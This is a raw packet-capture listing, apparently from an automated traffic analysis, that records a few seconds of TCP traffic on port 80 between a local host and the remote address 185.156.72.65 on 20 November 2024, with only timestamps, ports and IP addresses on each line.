                                                                Nov 20, 2024 05:02:21.762294054 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762294054 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762304068 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762317896 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762332916 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762335062 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762351036 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762353897 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762363911 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762368917 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762386084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762387037 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762398005 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762402058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762419939 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762419939 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762439013 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762448072 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762449026 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762466908 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762481928 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762485027 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762499094 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762515068 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762710094 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762725115 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762739897 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762753963 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762758017 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762768030 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762768030 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762789011 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762790918 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762804031 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762814999 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762820959 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762836933 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762840033 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762861967 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762872934 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762885094 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762890100 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762906075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762923002 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762927055 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762940884 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.762948990 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762974024 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.762981892 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.763021946 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763037920 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763052940 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763068914 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763076067 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.763084888 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763099909 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.763099909 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763117075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763122082 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.763148069 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.763158083 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.763163090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763180017 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763195038 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763211012 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763217926 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.763226986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763237000 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.763242960 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763258934 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763273001 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.763274908 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.763284922 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.763310909 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.763329983 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.956839085 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.956845045 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.956854105 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.956861019 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.956870079 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.956871986 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.956893921 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.956912994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.956949949 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.956965923 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.956981897 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.956991911 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.956998110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957003117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957014084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957024097 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957030058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957036018 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957046032 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957056999 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957062960 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957067966 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957087040 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957098961 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957108021 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957123041 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957156897 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957165003 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957174063 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957189083 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957202911 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957214117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957218885 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957225084 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957236052 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957252026 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957252979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957262993 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957268000 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957283974 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957285881 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957294941 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957299948 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957310915 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957317114 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957329988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957333088 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957343102 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957350016 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957357883 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957366943 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957372904 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957382917 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957398891 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957398891 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957411051 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957416058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957425117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957432032 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957439899 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957448959 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957461119 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957465887 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957469940 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957483053 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957495928 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957499981 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957506895 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957525015 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957535028 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957638979 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957653999 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957669020 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957681894 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957686901 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957694054 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957705021 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957707882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957720995 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957729101 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957737923 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957739115 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957758904 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957770109 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957782984 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957807064 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957820892 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957828045 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957837105 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957849026 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957850933 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957858086 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957866907 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957880020 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957880974 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957890034 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957911015 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957920074 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.957969904 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.957997084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958013058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958013058 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958028078 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958035946 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958044052 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958045959 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958059072 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958060026 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958076000 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958076954 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958091021 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958093882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958112955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958123922 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958129883 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958146095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958159924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958170891 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958175898 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958183050 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958193064 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958201885 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958211899 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958218098 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958229065 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958259106 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958264112 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958275080 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958291054 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958307028 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958312988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958323956 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958338976 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958338976 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958354950 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958363056 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958369970 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958384991 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958385944 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958403111 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958408117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958417892 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958425045 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958435059 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958452940 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958462954 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958471060 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958486080 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958496094 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958503008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958507061 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958518028 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958534002 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958534956 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958553076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958560944 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958570004 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958585024 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958585024 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958602905 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958610058 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958619118 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958635092 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958637953 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958652020 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958676100 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958759069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958774090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958789110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958801031 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958803892 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958818913 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958821058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958833933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958837986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958856106 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958861113 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958874941 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.958887100 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.958918095 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960546017 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960561991 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960577965 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960591078 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960623026 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960692883 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960709095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960724115 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960737944 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960752964 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960761070 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960768938 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960783958 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960786104 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960825920 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960844994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960844994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960850954 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960859060 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960866928 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960881948 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960895061 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960897923 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960906982 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960913897 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960931063 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960946083 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960946083 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960947990 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960957050 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960963011 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.960973024 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.960978985 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.192823887 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.192831993 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.192841053 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.192845106 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.192866087 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.192873955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.192892075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.192909002 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.192924023 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.192935944 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.192939997 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.192956924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.192956924 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.192969084 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.192974091 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.192990065 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.192991018 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193006039 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193015099 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193022966 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193033934 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193038940 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193048954 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193056107 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193070889 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193079948 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193088055 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193104029 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193104982 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193121910 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193129063 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193137884 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193152905 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193155050 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193171978 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193177938 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193188906 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193201065 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193205118 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193228006 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193232059 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193243027 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193257093 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193259954 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193276882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193281889 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193294048 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193309069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193316936 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193324089 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:22.193341970 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:22.193366051 CET4973080192.168.2.4185.156.72.65
